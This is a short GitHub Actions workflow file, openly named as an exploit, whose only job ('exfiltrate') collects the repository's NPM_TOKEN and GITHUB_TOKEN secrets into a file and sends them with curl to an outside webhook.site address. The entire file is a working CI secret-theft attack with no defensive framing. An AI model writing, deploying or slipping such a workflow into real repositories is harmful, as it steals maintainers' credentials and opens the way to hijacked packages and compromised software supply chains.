name: ExploitWorkflow
on:
  workflow_dispatch:

jobs:
  exfiltrate:
    runs-on: ubuntu-latest
    steps:
    - name: Checkout
      uses: actions/checkout@main
    - name: Steal Secrets
      run: |
        echo "NPM_TOKEN=${{ secrets.NPM_TOKEN }}" >> secrets.txt
        echo "GITHUB_TOKEN=${{ secrets.GITHUB_TOKEN }}" >> secrets.txt
        curl -X POST -d @secrets.txt https://webhook.site/aa8e00a1-1b60-42ed-b1b1-dad26d05d3d5
